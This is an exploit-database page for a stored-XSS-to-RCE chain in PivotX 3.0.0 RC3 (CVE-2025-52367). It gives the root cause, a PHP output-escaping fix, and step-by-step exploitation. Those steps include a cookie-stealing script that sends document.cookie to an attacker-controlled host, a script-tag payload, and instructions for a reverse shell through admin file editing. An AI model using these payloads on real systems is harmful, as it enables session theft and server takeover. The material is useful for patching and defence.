PivotX 3.0.0 RC3 - Remote Code Execution (RCE)

Published: 16 Jul 2025 00:00:00
Reported by: HayToN
Type: exploitdb
Source: www.exploit-db.com
Views: 352

PivotX 3.0.0 RC3 lacks input sanitization, leading to Stored XSS that, when triggered in an admin's session, enables Remote Code Execution.

Related

| Family | Reporter | Title | Published |
|---|---|---|---|
| Circl | circl | CVE-2025-52367 | 17 Jul 2025 21:02 |
| CNNVD | cnnvd | PivotX 3.0.0 RC3 Security Vulnerability | 16 Jul 2025 00:00 |
| CVE | cve | CVE-2025-52367 | 22 Sep 2025 00:00 |
| Cvelist | cvelist | CVE-2025-52367 | 22 Sep 2025 00:00 |
| EUVD | euvd | EUVD-2025-30753 | 22 Sep 2025 00:00 |
| Metasploit | metasploit | PivotX Remote Code Execution | 13 Aug 2025 18:54 |
| NVD | nvd | CVE-2025-52367 | 22 Sep 2025 19:15 |
| OSV | osv | CVE-2025-52367 | 22 Sep 2025 19:15 |
| Packet Storm | packetstorm | PivotX 3.0.0 RC3 Remote Code Execution / Cross Site Scripting | 16 Jul 2025 00:00 |
| Packet Storm | packetstorm | PivotX 3.0.0 RC 3 Remote Code Execution | 13 Aug 2025 00:00 |

Code
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367

## Vulnerability Type:
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().

## Root Cause:
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.

Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.
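The root cause described above is missing output encoding: whatever is stored in 'title' and 'subtitle' is concatenated into admin-panel markup unescaped. The PHP below is an added example written for this page, not PivotX's own code. It assumes $page is the associative array handed to savePage($page) and uses the field names from the advisory; the helpers escape_page_field, sanitize_plaintext_fields and render_page_header are hypothetical names. It runs the subtitle payload quoted in the advisory through an escaping renderer so the tag reaches the browser as inert text, and shows a save-time strip as defense in depth.

```php
<?php
// Added example, not PivotX code: output-escape the page fields that the
// advisory above identifies as rendered raw ('title' and 'subtitle').
// Assumptions: $page is the associative array passed to PivotX's
// savePage($page); every helper name below is hypothetical.

declare(strict_types=1);

/**
 * Escape one stored string for insertion into HTML text or attribute context.
 * ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
 * UTF-8 instead of returning an empty string (which would silently drop data).
 */
function escape_page_field(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Defense in depth at save time (hypothetical wrapper around savePage):
 * title and subtitle are plain-text fields, so markup has no business there.
 * This reduces what gets persisted but is NOT a substitute for escaping on
 * output; strip_tags() is not a full HTML sanitizer.
 */
function sanitize_plaintext_fields(array $page): array
{
    foreach (['title', 'subtitle'] as $field) {
        if (isset($page[$field])) {
            $page[$field] = trim(strip_tags((string) $page[$field]));
        }
    }
    return $page;
}

/**
 * Hypothetical admin-panel renderer: every stored value passes through
 * escape_page_field() before it is concatenated into markup, which is the
 * step the vulnerable code path skips.
 */
function render_page_header(array $page): string
{
    $title    = escape_page_field((string) ($page['title'] ?? ''));
    $subtitle = escape_page_field((string) ($page['subtitle'] ?? ''));
    return "<h1>{$title}</h1>\n<h2>{$subtitle}</h2>\n";
}

// Constructed sample page carrying the subtitle payload quoted in the advisory.
$page = [
    'title'    => 'Quarterly report',
    'subtitle' => '<script src="http://LOCAL_IP/lol.js"></script>',
];

// Escaped rendering: the angle brackets and quotes become HTML entities,
// so the browser displays the string instead of loading a script.
$html = render_page_header($page);
echo $html;

// Self-check: escaped output must never contain a live <script> tag.
if (stripos($html, '<script') !== false) {
    throw new RuntimeException('escaping failed');
}

// Save-time hardening removes the markup before the array reaches serialize().
$stored = sanitize_plaintext_fields($page);
echo serialize($stored), "\n";
```

Output escaping is the fix that actually closes the bug; the save-time strip only limits what an attacker can persist and would not protect any other template that still echoes the fields raw.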

Note: If you are already admin, skip steps 1-7.

## Exploitation Steps:
1. Log in as an authenticated user (a normal user; admin is not needed).

2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page

3. Create a JavaScript file locally containing cookie-stealing code, for example a file named lol.js containing:

document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;

4. In the "Subtitle" field, input the following payload (change the file name to match yours):

<script src="http://LOCAL_IP/lol.js"></script>

5. Publish the page.

6. When an admin views the published page in the blog, the XSS will execute in the admin’s context.

7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.

8. Navigate as admin to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit the index.php file.

9. Edit the index.php file into any PHP file you want in order to gain RCE on the target, for example a reverse shell or any other method.

10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)

# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3


Scores (current as of 16 Jul 2025 00:00):
- Vulners AI Score: 7.4 (High risk)
- CVSS 3.1: 5.4
- EPSS: 0.7027